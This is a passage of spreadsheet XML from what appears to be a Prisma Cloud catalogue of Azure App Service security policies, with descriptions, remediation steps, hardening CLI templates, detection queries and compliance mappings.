Note: App Services with Free sku plan is ideal for testing applications in a managed Azure environment. For Free sku plan client certificates option is not supported. We recomended to upgrade such reported app service as per your requirement apart from free sku plan. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-7
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-7</t>
        </is>
      </c>
      <c r="Y2170" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Web/sites/app_name/config/*' permission. Successful execution enables Client certificates,
only clients that have a valid certificate will be able to reach the app.",
'impact': 'Enables client certificate in Azure App Service',
'cliScriptTemplate': 'az webapp update --resource-group $resourceGroup --name $resourceName --set clientCertEnabled=true'</t>
        </is>
      </c>
      <c r="Z2170" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = 'kind starts with app and properties.clientCertEnabled equals false'
{"category":"Networking","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA2170" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2170" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2170" t="inlineStr">
        <is>
          <t>PC-AZR-APP-409-CKV_AZURE_17</t>
        </is>
      </c>
      <c r="AD2170" t="b">
        <v>1</v>
      </c>
      <c r="AE2170" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2170" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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0" t="inlineStr">
        <is>
          <t>b1eec428-ad10-4206-a40e-916dbb0a76bd</t>
        </is>
      </c>
      <c r="AI2170" t="inlineStr">
        <is>
          <t>b2b42ffc-6552-4e5c-a189-7f76e4adb53b</t>
        </is>
      </c>
      <c r="AJ2170" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2170" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2171">
      <c r="A2171" t="inlineStr"/>
      <c r="B2171" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2171" s="2" t="inlineStr"/>
      <c r="D2171" t="inlineStr"/>
      <c r="E2171" t="inlineStr"/>
      <c r="F2171" t="inlineStr"/>
      <c r="G2171" t="b">
        <v>1</v>
      </c>
      <c r="H21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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2171" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2171" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable Azure function [Apache, CVE-2022-42889]</t>
        </is>
      </c>
      <c r="L2171" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2171" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2171" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2171" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2171" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2171" t="inlineStr"/>
      <c r="R2171" t="inlineStr"/>
      <c r="S2171" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2171" t="b">
        <v>0</v>
      </c>
      <c r="U2171" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2171" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2171" t="inlineStr">
        <is>
          <t>This policy identifies Azure Functions that are publicly exposed and have a known exploitable remote code execution vulnerability in Apache [CVE-2022-42889].
Remote code execution is a critical security concern that enables unauthorized users to execute arbitrary code on a system, potentially leading to data breaches, system compromise, or unauthorized data manipulation. The fact that the Azure function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Apache [CVE-2022-42889] vulnerability and public exposure reported for the Azure function as soon as possible.</t>
        </is>
      </c>
      <c r="X2171"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2171" t="inlineStr"/>
      <c r="Z2171" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('azure-app-service') and finding.name contains all ('(Disabled) Azure Function app configured with public network access') AND with : (Vuln WHERE id IN ('CVE-2022-42889'))</t>
        </is>
      </c>
      <c r="AA2171" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2171" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:03</t>
        </is>
      </c>
      <c r="AC2171" t="inlineStr"/>
      <c r="AD2171" t="b">
        <v>1</v>
      </c>
      <c r="AE2171" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2171" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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1" t="inlineStr">
        <is>
          <t>4e2dacd8-7c64-4414-bb5d-10581a219bd6</t>
        </is>
      </c>
      <c r="AI2171" t="inlineStr">
        <is>
          <t>3b405ea3-d238-4f0f-8000-50a243e70a8e</t>
        </is>
      </c>
      <c r="AJ2171" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2171" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2172">
      <c r="A2172" t="inlineStr">
        <is>
          <t>CIS Controls v8.1, NIST SP 800-171 Revision 3, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, ITSG-33, GDPR, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2172" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2172" s="2" t="inlineStr"/>
      <c r="D2172" t="inlineStr"/>
      <c r="E2172" t="inlineStr"/>
      <c r="F2172" t="inlineStr"/>
      <c r="G2172" t="b">
        <v>1</v>
      </c>
      <c r="H217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172" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2172" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2172" t="inlineStr">
        <is>
          <t>Azure Logic app using insecure TLS version</t>
        </is>
      </c>
      <c r="L2172" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2172" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2172" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2172" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2172" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2172" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R2172" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S2172" t="inlineStr"/>
      <c r="T2172" t="b">
        <v>0</v>
      </c>
      <c r="U2172" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2172" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2172" t="inlineStr">
        <is>
          <t>This policy identifies Azure Logic apps that are using insecure TLS version.
Azure Logic apps configured to use insecure TLS versions are at risk as they may be vulnerable to security threats due to the known vulnerabilities, weaker encryption methods, and support for compromised hash functions. Logic apps using TLS 1.2 or higher will secure communication and protect against potential cyber attacks.
As a security best practice,  it is recommended to configure Logic apps with TLS 1.2 or higher to ensure secure communication.</t>
        </is>
      </c>
      <c r="X2172" t="inlineStr">
        <is>
          <t>1. Log in to Azure portal
2. Navigate to Logic apps
3. Click on the reported Logic app
4. Under 'Setting' section, click on 'Configuration'
5. Under 'General settings' tab, Set 'Minimum Inbound TLS Version' to '1.2' or higher.
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2172" t="inlineStr"/>
      <c r="Z2172" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = properties.state equal ignore case Running and kind contains workflowapp and (config.minTlsVersion equals "1.0" or config.minTlsVersion equals "1.1")</t>
        </is>
      </c>
      <c r="AA2172" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2172" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2172" t="inlineStr">
        <is>
          <t>PC-AZR-APP-1218</t>
        </is>
      </c>
      <c r="AD2172" t="b">
        <v>1</v>
      </c>
      <c r="AE2172" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2172" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG217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72" t="inlineStr">
        <is>
          <t>5953af8c-7557-4a4e-ac08-b7679be4e3e9</t>
        </is>
      </c>
      <c r="AI2172" t="inlineStr">
        <is>
          <t>6bf2ca99-c09e-4e96-b723-3dfc3f8d2786</t>
        </is>
      </c>
      <c r="AJ2172" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2172" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2173">
      <c r="A2173" t="inlineStr"/>
      <c r="B2173" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2173" s="2" t="inlineStr"/>
      <c r="D2173" t="inlineStr"/>
      <c r="E2173" t="inlineStr"/>
      <c r="F2173" t="inlineStr"/>
      <c r="G2173" t="b">
        <v>1</v>
      </c>
      <c r="H21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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2173" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2173" t="inlineStr">
        <is>
          <t>Privilege Escalation risk due to unauthenticated public access and insecure permissions in an Azure Function</t>
        </is>
      </c>
      <c r="L2173" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M2173" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2173" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2173" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2173" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2173" t="inlineStr"/>
      <c r="R2173" t="inlineStr"/>
      <c r="S2173" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2173" t="b">
        <v>0</v>
      </c>
      <c r="U2173" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2173" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2173" t="inlineStr">
        <is>
          <t>This policy identifies Azure Function Apps that are publicly exposed, not configured with app authentication and have risky permissions that could potentially lead to privilege escalation.
Publicly exposed Azure Function Apps without app authentication could allow malicious actors to remotely exploit and get the initial access to the resource. The risky permissions on the web app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configure Azure Function app authentication, review risky privilege escalation permissions, and restrict public exposure reported for the Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2173"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Navigate to Function App
3. Click on the reported Function App
4. Under Settings section, Click on 'Authentication'
5. Click on 'Add identity provider'
6. Select an identity provider from the dropdown and choose other parameters as per your requirement
7. Click on 'Add'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built-in or custom role without risky permissions, if necessary</t>
        </is>
      </c>
      <c r="Y2173" t="inlineStr"/>
      <c r="Z2173" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-app-service') and finding.name contains all ('(Disabled) Azure Function app configured with public network access','Azure entities with risky permissions','Azure Function App authentication is off')</t>
        </is>
      </c>
      <c r="AA2173" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2173" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:18</t>
        </is>
      </c>
      <c r="AC2173" t="inlineStr"/>
      <c r="AD2173" t="b">
        <v>1</v>
      </c>
      <c r="AE2173" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2173" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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3" t="inlineStr">
        <is>
          <t>050fdd99-c637-46ad-a110-a229a11eae44</t>
        </is>
      </c>
      <c r="AI2173" t="inlineStr">
        <is>
          <t>9514ff28-8339-4d1c-ae88-af7ce51964a9</t>
        </is>
      </c>
      <c r="AJ2173" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2173" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2174">
      <c r="A2174" t="inlineStr"/>
      <c r="B2174" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2174" s="2" t="inlineStr"/>
      <c r="D2174" t="inlineStr"/>
      <c r="E2174" t="inlineStr"/>
      <c r="F2174" t="inlineStr"/>
      <c r="G2174" t="b">
        <v>1</v>
      </c>
      <c r="H21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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2174" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2174" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed Azure App Service with remote debugging enabled and insecure permissions</t>
        </is>
      </c>
      <c r="L2174" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M2174" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2174" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2174" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2174" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2174" t="inlineStr"/>
      <c r="R2174" t="inlineStr"/>
      <c r="S2174" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2174" t="b">
        <v>0</v>
      </c>
      <c r="U2174" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2174" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2174" t="inlineStr">
        <is>
          <t>This policy identifies Azure Web Apps that are publicly exposed, Remote debugging is enabled, and have risky permissions that could potentially lead to privilege escalation.
Publicly exposed Azure Web Apps with remote debugging enabled could allow malicious actors to remotely exploit and get initial access to the Azure Web app. Remote debugging when enabled in Azure Web App will also open a few known inbound ports based on the programming language used. These open ports could be exploited and Azure Web App Service could be compromised for further attacks, with the risky privilege escalation permissions attached to the Azure Web App further help the attackers to perform unauthorised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configure Azure Web app remote debugging with a disabled state, review risky privilege escalation permissions, and restrict public exposure reported for the Azure Web App as soon as possible.</t>
        </is>
      </c>
      <c r="X2174" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
1. Log in to the Azure portal
2. Navigate to App Services
3. Click on the reported App Service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Select 'App Services' from the left pane
3. Select the reported App Services
4. Go to 'Configurations' under 'Settings'
5. Click on 'General settings'
6. Select 'Off' for 'Remote debugging' under 'Debugging section
7. Click on 'Save'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built-in or custom role without risky permissions, if necessary</t>
        </is>
      </c>
      <c r="Y2174" t="inlineStr"/>
      <c r="Z2174" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-app-service') and finding.name contains all ('Azure App Service web apps with public network access','Azure App Services Remote debugging is enabled','Azure entities with risky permissions')</t>
        </is>
      </c>
      <c r="AA2174" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2174" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:18</t>
        </is>
      </c>
      <c r="AC2174" t="inlineStr"/>
      <c r="AD2174" t="b">
        <v>1</v>
      </c>
      <c r="AE2174" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2174" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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4" t="inlineStr">
        <is>
          <t>313f6b14-3f64-4179-8ac1-1bf354df48a0</t>
        </is>
      </c>
      <c r="AI2174" t="inlineStr">
        <is>
          <t>38d49dd4-40ef-42e1-ae81-4721e901a15f</t>
        </is>
      </c>
      <c r="AJ2174" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2174" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2175">
      <c r="A2175" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, NIST SP 800-171 Revision 3</t>
        </is>
      </c>
      <c r="B2175" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2175" s="2" t="inlineStr"/>
      <c r="D2175" t="inlineStr"/>
      <c r="E2175" t="inlineStr"/>
      <c r="F2175" t="inlineStr"/>
      <c r="G2175" t="b">
        <v>1</v>
      </c>
      <c r="H21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175" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2175" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2175" t="inlineStr">
        <is>
          <t>Azure Logic app is not configured with managed identity</t>
        </is>
      </c>
      <c r="L2175" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2175" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2175" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2175" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2175" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2175" t="inlineStr">
        <is>
          <t>3.1</t>
        </is>
      </c>
      <c r="R2175" t="inlineStr">
        <is>
          <t>Access Enforcement</t>
        </is>
      </c>
      <c r="S2175" t="inlineStr"/>
      <c r="T2175" t="b">
        <v>0</v>
      </c>
      <c r="U2175" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2175" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2175" t="inlineStr">
        <is>
          <t>This policy identifies Azure Logic apps that are not configured with managed identity.
Managed identity can be used to authenticate to any service that supports Azure AD authentication, without having credentials in your code. Including credentials in code heightens the risk in the event of a security breach and increases the threat surface in case of exploitation and also managed identities eliminate the need for developers to manage credentials.
As a security best practice, it is recommended to set up managed identity rather than embedding credentials within the code.</t>
        </is>
      </c>
      <c r="X2175" t="inlineStr">
        <is>
          <t>1. Log in to Azure portal
2. Navigate to Logic apps
3. Click on the reported Logic app
4. Under 'Setting' section, click on 'Identity'
5. Configure either 'System assigned' or 'User assigned' managed identity based on your requirement.
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2175" t="inlineStr"/>
      <c r="Z2175" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = properties.state equal ignore case Running and kind contains workflowapp and (identity.type does not exist or identity.principalId is empty)</t>
        </is>
      </c>
      <c r="AA2175" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2175" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2175" t="inlineStr">
        <is>
          <t>PC-AZR-APP-1217</t>
        </is>
      </c>
      <c r="AD2175" t="b">
        <v>1</v>
      </c>
      <c r="AE2175" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2175" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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175" t="inlineStr">
        <is>
          <t>ec03baf8-3358-4adb-9451-42ba86c1260c</t>
        </is>
      </c>
      <c r="AI2175" t="inlineStr">
        <is>
          <t>36bf6693-00df-4034-998d-48a2002d3048</t>
        </is>
      </c>
      <c r="AJ2175" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2175" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2176">
      <c r="A2176" t="inlineStr"/>
      <c r="B2176" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2176" s="2" t="inlineStr"/>
      <c r="D2176" t="inlineStr"/>
      <c r="E2176" t="inlineStr"/>
      <c r="F2176" t="inlineStr"/>
      <c r="G2176" t="b">
        <v>1</v>
      </c>
      <c r="H21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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2176" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2176" t="inlineStr">
        <is>
          <t>Denial of Service (DoS) risk due to publicly exposed and vulnerable Azure Function [Python, CVE-2021-20270]</t>
        </is>
      </c>
      <c r="L2176" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2176" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2176" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2176" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2176" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2176" t="inlineStr"/>
      <c r="R2176" t="inlineStr"/>
      <c r="S2176" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2176" t="b">
        <v>0</v>
      </c>
      <c r="U2176" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2176" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2176" t="inlineStr">
        <is>
          <t>This policy identifies Azure Functions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Azure Function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Python [CVE-2021-20270] vulnerability and public exposure reported for the Azure Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2176"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2176" t="inlineStr"/>
      <c r="Z2176" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('azure-app-service') and finding.name contains all ('(Disabled) Azure Function app configured with public network access') AND with : (Vuln WHERE id IN ('CVE-2021-20270'))</t>
        </is>
      </c>
      <c r="AA2176" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2176" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:55</t>
        </is>
      </c>
      <c r="AC2176" t="inlineStr"/>
      <c r="AD2176" t="b">
        <v>1</v>
      </c>
      <c r="AE2176" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2176" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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6" t="inlineStr">
        <is>
          <t>462bf60f-efaa-4606-b6f9-1e59d78604f6</t>
        </is>
      </c>
      <c r="AI2176" t="inlineStr">
        <is>
          <t>25a9edf7-e99f-4dbc-8064-ec2a86825d2b</t>
        </is>
      </c>
      <c r="AJ2176" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2176" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2177">
      <c r="A2177" t="inlineStr">
        <is>
          <t>CSA CCM v.4.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, Azure Security Benchmark (v2), NIST CSF v2.0, APRA (CPS 234) Information Security, NIST SP 800-172, CIS v2.1.0 (Azure) Level 1, ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, FFIEC, ITSG-33, CIS v1.5.0 (Azure) - Level 1, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, Telecommunications Security Act - TSA, CIS v1.2.0 (Azure), ISO/IEC 27002:2013, Azure Security Benchmark (v3), NIST SP 800-171 Revision 2, CIS Controls v7.1, PCI DSS v4.0, CRI Profile v1.2.1, ISO 27002:2022, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ISO/IEC 27017:2015, GDPR, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, DORA, NIST CSF v2.0, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, NIST 800-53 Rev4, CIS v1.3.0 (Azure), ISO/IEC 27018:2019, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS v1.3.1 (Azure), CIS Controls v8.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), CIS v1.4.0 (Azure), MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, CRI Profile v1.2.1, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v3.2.1, CRI Profile v2.0, Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, CCPA 2018, PIPEDA, ISO/IEC 27002:2013, CIS Controls v8, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), CIS v2.0.0 (Azure) Level 1, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, Azure Security Benchmark (v2), CSA CCM v.4.0.1, NIST SP 800-172, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CIS v1.1 (Azure)</t>
        </is>
      </c>
      <c r="B2177" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2177" s="2" t="inlineStr"/>
      <c r="D2177" t="inlineStr"/>
      <c r="E2177" t="inlineStr"/>
      <c r="F2177" t="inlineStr"/>
      <c r="G2177" t="b">
        <v>1</v>
      </c>
      <c r="H21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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2177" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2177" t="inlineStr">
        <is>
          <t>Azure App Service Web app doesn't redirect HTTP to HTTPS</t>
        </is>
      </c>
      <c r="L2177" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2177" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2177" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2177" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2177" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2177" t="inlineStr">
        <is>
          <t>9</t>
        </is>
      </c>
      <c r="R2177" t="inlineStr">
        <is>
          <t>9.2</t>
        </is>
      </c>
      <c r="S2177" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2177" t="b">
        <v>1</v>
      </c>
      <c r="U2177" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2177" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2177" t="inlineStr">
        <is>
          <t>Azure Web Apps allows sites to run under both HTTP and HTTPS by default. Web apps can be accessed by anyone using non-secure HTTP links by default. Non-secure HTTP requests can be restricted and all HTTP requests redirected to the secure HTTPS port. It is recommended to enforce HTTPS-only traffic.</t>
        </is>
      </c>
      <c r="X2177" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to App Services
3. Click on the reported App
4. Under the Settings section, Click on 'Configuration'
5. In  'General Settings', under 'Platform settings'  Set 'HTTPS Only' to 'On' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-5
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-5</t>
        </is>
      </c>
      <c r="Y2177" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Web/sites/app_name/config/*' permission. Successful execution set on HTTPS-only feature,
by which non-secure HTTP requests can be restricted and all HTTP requests will be redirected to the secure HTTPS port.",
'impact': 'Redirects all HTTP traffic to HTTPS in Azure App Service',
'cliScriptTemplate': 'az webapp update --resource-group $resourceGroup --name $resourceName --set httpsOnly=true'</t>
        </is>
      </c>
